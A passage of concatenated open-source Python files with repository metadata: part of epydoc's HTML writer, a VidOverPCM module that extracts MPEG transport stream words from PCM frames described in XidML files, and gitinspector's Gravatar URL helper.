If a C{NamespaceDoc} C{context} is specified, the target label is contextualized to it. """ assert isinstance(target, (APIDoc, DottedName)) # Pick a label, if none was given. if label is None: if isinstance(target, VariableDoc): label = target.name elif (isinstance(target, ValueDoc) and target.canonical_name is not UNKNOWN): label = target.canonical_name elif isinstance(target, DottedName): label = target elif isinstance(target, GenericValueDoc): raise ValueError("href() should not be called with " "GenericValueDoc objects (perhaps you " "meant to use the containing variable?)") else: raise ValueError("Unable to find a label for %r" % target) if context is not None and isinstance(label, DottedName): label = label.contextualize(context.canonical_name.container()) label = plaintext_to_html(str(label)) # Munge names for scripts & unreachable values if label.startswith('script-'): label = label[7:] + ' (script)' if label.startswith('??'): label = '<i>unreachable</i>' + label[2:] label = re.sub(r'-\d+$', '', label) # Get the url for the target. url = self.url(target) if url is None: if tooltip: return '<span title="%s">%s</span>' % (tooltip, label) else: return label # Construct a string for the class attribute. if css_class is None: css = '' else: css = ' class="%s"' % css_class onclick = '' if ((isinstance(target, VariableDoc) and not target.is_public) or (isinstance(target, ValueDoc) and not isinstance(target, GenericValueDoc) and not self._val_is_public(target))): onclick = ' onclick="show_private();"' if tooltip: tooltip = ' title="%s"' % tooltip else: tooltip = '' return '<a href="%s"%s%s%s>%s</a>' % (url, css, onclick, tooltip, label) def _attr_to_html(self, attr, api_doc, indent): if api_doc in (None, UNKNOWN): return '' pds = getattr(api_doc, attr, None) # pds = ParsedDocstring. 
if pds not in (None, UNKNOWN): return self.docstring_to_html(pds, api_doc, indent) elif isinstance(api_doc, VariableDoc): return self._attr_to_html(attr, api_doc.value, indent) def summary(self, api_doc, indent=0): return self._attr_to_html('summary', api_doc, indent) def descr(self, api_doc, indent=0): return self._attr_to_html('descr', api_doc, indent) def type_descr(self, api_doc, indent=0): return self._attr_to_html('type_descr', api_doc, indent) def return_type(self, api_doc, indent=0): return self._attr_to_html('return_type', api_doc, indent) def return_descr(self, api_doc, indent=0): return self._attr_to_html('return_descr', api_doc, indent) def docstring_to_html(self, parsed_docstring, where=None, indent=0): if parsed_docstring in (None, UNKNOWN): return '' linker = _HTMLDocstringLinker(self, where) s = parsed_docstring.to_html(linker, indent=indent, directory=self._directory, docindex=self.docindex, context=where).strip() if self._mark_docstrings: s = '<span class="docstring">%s</span><!--end docstring-->' % s return s def description(self, parsed_docstring, where=None, indent=0): assert isinstance(where, (APIDoc, type(None))) if parsed_docstring in (None, UNKNOWN): return '' linker = _HTMLDocstringLinker(self, where) descr = parsed_docstring.to_html(linker, indent=indent, directory=self._directory, docindex=self.docindex, context=where).strip() if descr == '': return '&nbsp;' return descr # [xx] Should this be defined by the APIDoc classes themselves?? 
def doc_kind(self, doc): if isinstance(doc, ModuleDoc) and doc.is_package == True: return 'Package' elif (isinstance(doc, ModuleDoc) and doc.canonical_name[0].startswith('script')): return 'Script' elif isinstance(doc, ModuleDoc): return 'Module' elif isinstance(doc, ClassDoc): return 'Class' elif isinstance(doc, ClassMethodDoc): return 'Class Method' elif isinstance(doc, StaticMethodDoc): return 'Static Method' elif isinstance(doc, RoutineDoc): if isinstance(self.docindex.container(doc), ClassDoc): return 'Method' else: return 'Function' else: return 'Variable' def _doc_or_ancestor_is_private(self, api_doc): name = api_doc.canonical_name for i in range(len(name), 0, -1): # Is it (or an ancestor) a private var? var_doc = self.docindex.get_vardoc(name[:i]) if var_doc is not None and var_doc.is_public == False: return True # Is it (or an ancestor) a private module? val_doc = self.docindex.get_valdoc(name[:i]) if (val_doc is not None and isinstance(val_doc, ModuleDoc) and val_doc.canonical_name[-1].startswith('_')): return True return False def _private_subclasses(self, class_doc): """Return a list of all subclasses of the given class that are private, as determined by L{_val_is_private}. Recursive subclasses are included in this list.""" queue = [class_doc] private = set() for cls in queue: if (isinstance(cls, ClassDoc) and cls.subclasses not in (None, UNKNOWN)): queue.extend(cls.subclasses) private.update([c for c in cls.subclasses if not self._val_is_public(c)]) return private class _HTMLDocstringLinker(epydoc.markup.DocstringLinker): def __init__(self, htmlwriter, container): self.htmlwriter = htmlwriter self.docindex = htmlwriter.docindex self.container = container def translate_indexterm(self, indexterm): key = self.htmlwriter._term_index_to_anchor(indexterm) return ('<a name="%s"></a><i class="indexterm">%s</i>' % (key, indexterm.to_html(self))) def translate_identifier_xref(self, identifier, label=None): # Pick a label for this xref. 
if label is None: label = plaintext_to_html(identifier) # Find the APIDoc for it (if it's available). doc = self.docindex.find(identifier, self.container) # If we didn't find a target, then try checking in the contexts # of the ancestor classes. if doc is None and isinstance(self.container, RoutineDoc): container = self.docindex.get_vardoc( self.container.canonical_name) while (doc is None and container not in (None, UNKNOWN) and container.overrides not in (None, UNKNOWN)): container = container.overrides doc = self.docindex.find(identifier, container) # Translate it into HTML. if doc is None: self._failed_xref(identifier) return '<code class="link">%s</code>' % label else: return self.htmlwriter.href(doc, label, 'link') # [xx] Should this be added to the DocstringLinker interface??? # Currently, this is *only* used by dotgraph. def url_for(self, identifier): if isinstance(identifier, (basestring, DottedName)): doc = self.docindex.find(identifier, self.container) if doc: return self.htmlwriter.url(doc) else: return None elif isinstance(identifier, APIDoc): return self.htmlwriter.url(identifier) doc = identifier else: raise TypeError('Expected string or APIDoc') def _failed_xref(self, identifier): """Add an identifier to the htmlwriter's failed crossreference list.""" # Don't count it as a failed xref if it's a parameter of the # current function. if (isinstance(self.container, RoutineDoc) and identifier in self.container.all_args()): return failed_xrefs = self.htmlwriter._failed_xrefs context = self.container.canonical_name failed_xrefs.setdefault(identifier,{})[context] = 1
apache-2.0
diarmuidcwc/GTSVideoDecom
VidOverPCM.py
1
12132
#------------------------------------------------------------------------------- # Name: VidOverPCM # Purpose: # # Copyright 2014 Diarmuid Collins dcollins@curtisswright.com # https://github.com/diarmuid # # # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. import xml.etree.ElementTree as etree import re import array import struct import math import logging def natural_sort(l): convert = lambda text: int(text) if text.isdigit() else text.lower() alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ] return sorted(l, key = alphanum_key) class VidOverPCM(): def __init__(self): self.xidml = None self.xidmlVersion = "2.41" self.tree = None self.root = None self.vids = dict() self.vidInstruments = {"KAD/VID/106","KAD/VID/103"} # Hard code these for the moment but they can be pulled from the xidml self.minorFrameOffsetBits = 32 self.minorFramesPerMajorFrames =1 self.dataBitsPerWord = 16 self.vidsPerXidml = list() # Internal only self._maxWordOffset = 0 self._parameterOfInterestRE = "_VIDEO_" self._parameterReferenceVendorOfInterestRE = "MPEG2TS|Video" self._allVidParams = dict() def parseXidml(self,xidml): '''Parse a xidml2.4 file and setup the VidOverPCM class :type xidml: str ''' try: self.tree = etree.parse(xidml) self.root = self.tree.getroot() self.parent_map ={c:p for p in self.tree.iter() for c in 
p} # create a dict so I can figure out the parents and gps except: raise IOError("Failed to parse {}".format(xidml)) self.xidml = xidml self.xidmlVersion = self.root.attrib["Version"] self._findAllModules() self._findAllParameters() self._findAllPCMPackages() self._pruneUnusedVids() self._numberOfVids() self._preCalcParams() def _numberOfVids(self): '''Calculate how many separate VID instruments have parameters''' for vid,params in self.vids.iteritems(): numberOfParams = len(params) if numberOfParams > 0: self.vidsPerXidml.append(vid) def _preCalcParams(self): '''This function creates a dict per vid with a list of indices for a word buffer This allows me to take a list of words and convert to a buffer''' self._vidsCache = dict() for vid,params in self.vids.items(): numberOfParams = len(params) self._vidsCache[vid] = dict() for p_index,param in enumerate(natural_sort(params)): for wd_index,word_offset in enumerate(params[param]): # This works out the location within the PCM frame of every video word and caches it self._vidsCache[vid][(wd_index*numberOfParams)+p_index] = word_offset if self._maxWordOffset < word_offset: self._maxWordOffset = word_offset def frameToBuffers(self,listofwords): '''Takes a buffer containing a major frame and returns a list of buffers of MPEG_TS :type listofwords: list(str) ''' vid_bufs = {} #print "DEBUG: list of words len = {}".format(len(listofwords)) if self._maxWordOffset > len(listofwords): raise ValueError ("List of words not long enough .Are you using the correct xidml source file?") for vid in self.vids: vid_bufs[vid] = "" for vid,params in self.vids.items(): # Now convert the dict back into string buffers for idx in sorted(self._vidsCache[vid]): vid_bufs[vid] += struct.pack('>H',listofwords[self._vidsCache[vid][idx]]) return vid_bufs def _findAllModules(self): '''Find all the video instruments in the xidml both 2.4 and 3.0''' allModules = self.root.findall(".//PartReference") for module in allModules: if module.text in 
self.vidInstruments: try: mygp = self.parent_map[self.parent_map[module]] vidname = mygp.attrib["Name"] self.vids[vidname] = dict() # dict will contain the parameters + locations except: raise Exception("Failed to get parent module of {}".format(module.text)) def _findAllParameters(self): '''Find all the parameters of interest connected to the video instruments''' allParameters = self.root.findall(".//Parameter") if self.xidmlVersion == "2.41": for parameter in allParameters: source_instrument = parameter.find("Source/Signal/InstrumentReference") if source_instrument != None: if source_instrument.text in self.vids: if re.search(self._parameterOfInterestRE,parameter.attrib["Name"]): # Build up a dict containing each instrument, each parameter and a list of the word offsets self.vids[source_instrument.text][parameter.attrib["Name"]] = list() self._allVidParams[parameter.attrib["Name"]] = source_instrument.text else: allParameterReferences = self.root.findall(".//Parameters/ParameterReference") for parameterreference in allParameterReferences: try: mygp = self.parent_map[self.parent_map[parameterreference]] source_instrument = mygp.attrib["Name"] except: raise Exception("Failed to get parent of {}".format(parameterreference.text)) if source_instrument != None: if source_instrument in self.vids: if re.search(self._parameterReferenceVendorOfInterestRE, parameterreference.attrib["VendorName"]): self.vids[source_instrument][parameterreference.text] = list() self._allVidParams[parameterreference.text] = source_instrument def _findAllPCMPackages(self): '''Find all the parameters of interest connected to the video instruments''' if self.xidmlVersion == "2.41": allPCMPackages= self.root.findall("Packages/PackageSet/X-IRIG-106-Ch-4-1.2") for package in allPCMPackages: bitsPerFrame = int(package.findtext("Properties/MajorFrameProperties/BitsPerMinorFrame")) minorFramesPerMajorFrames = int(package.findtext("Properties/MajorFrameProperties/MinorFramesPerMajorFrame")) for param in 
package.findall("Content/Parameter"): pname = param.attrib["Name"] if pname in self._allVidParams: # Some testing of supported structures if int(param.findtext("NumberOfDataBits")) != 16: raise Exception("Video parameters of 1 word supported only") if int(param.findtext("Location/MinorFrameNumber")) != 1: raise Exception("Currently only support 1 minor frame") # We have to handle the offset and then get a word index #Occurrances seem o be ber major frame so divide to get occurrances per minor frame if param.findtext("Location/Occurrences"): poccurrances = int(param.findtext("Location/Occurrences")) / minorFramesPerMajorFrames else: poccurrances = 1 # Databits in words if param.findtext("NumberOfDataBits"): dbits = int(param.findtext("NumberOfDataBits")) else: dbits = self.dataBitsPerWord firstWordOffset = int(param.findtext("Location/Offset_Bits"))/dbits offsetWordInterval = bitsPerFrame / (poccurrances * dbits) # If there are multiple instances of the word in a frame then they are equally spaced in the fram # record the word offset per parameter in an array for offset in range(poccurrances): self.vids[self._allVidParams[pname]][pname].append(firstWordOffset+(offsetWordInterval*offset)) else: allPCMPackages= self.root.findall("Packages/PackageSet/IRIG-106-Ch-4") for package in allPCMPackages: bitsPerFrame = int(package.findtext("Properties/MajorFrameProperties/BitsPerMinorFrame")) dbits = int(package.findtext("Properties/MajorFrameProperties/DefaultDataBitsPerWord")) minorframeoffset = int(package.findtext("Properties/SynchronizationStrategy/SubframeSynchronizationStrategy/SFID/MinorFrameOffset_Words")) for mapping in package.findall("Content/Mapping"): pref = mapping.findtext("ParameterReference") if pref in self._allVidParams: if int(mapping.findtext("Location/MinorFrameNumber")) != 1: raise Exception("Currently only support 1 minor frame") if mapping.findtext("Location/Occurrences"): poccurrances = int(mapping.findtext("Location/Occurrences")) else: poccurrances 
= 1 # Databits in words firstWordOffset = int(mapping.findtext("Location/Offset_Words")) (remainder, offsetWordInterval) = math.modf(float(bitsPerFrame) / (poccurrances * dbits)) logging.warning("Illegal xidml frame. I can only guess the frame structure based on the xidml") # DASStudio generates invalid frames at time and this is the workaround roundUpEveryXOccurances = int(math.ceil(1/remainder)) offsetWordInterval = int(offsetWordInterval) # If there are multiple instances of the word in a frame then they are equally spaced in the fram # record the word offset per parameter in an array addOffsetIllegalFrame = 0 for offset in range(poccurrances): self.vids[self._allVidParams[pref]][pref].append(addOffsetIllegalFrame+minorframeoffset+firstWordOffset+(offsetWordInterval*offset)) if offset % offsetWordInterval == (offsetWordInterval-1): addOffsetIllegalFrame += 1 def _pruneUnusedVids(self): vidIsUnused = dict() for vid,params in self.vids.iteritems(): vidIsUnused[vid] = True for location in params: if len(self.vids[vid][location]) > 0: vidIsUnused[vid] = False for vid in vidIsUnused: if vidIsUnused[vid] == True: del self.vids[vid]
gpl-2.0
natpen/gitinspector
gitinspector/gravatar.py
47
1278
# coding: utf-8 # # Copyright © 2013 Ejwa Software. All rights reserved. # # This file is part of gitinspector. # # gitinspector is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # gitinspector is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with gitinspector. If not, see <http://www.gnu.org/licenses/>. from __future__ import unicode_literals try: from urllib.parse import urlencode except: from urllib import urlencode import format import hashlib def get_url(email, size=20): md5hash = hashlib.md5(email.encode("utf-8").lower().strip()).hexdigest() base_url = "https://www.gravatar.com/avatar/" + md5hash params = None if format.get_selected() == "html": params = {"default": "identicon", "size": size} elif format.get_selected() == "xml": params = {"default": "identicon"} return base_url + "?" + urlencode(params)
gpl-3.0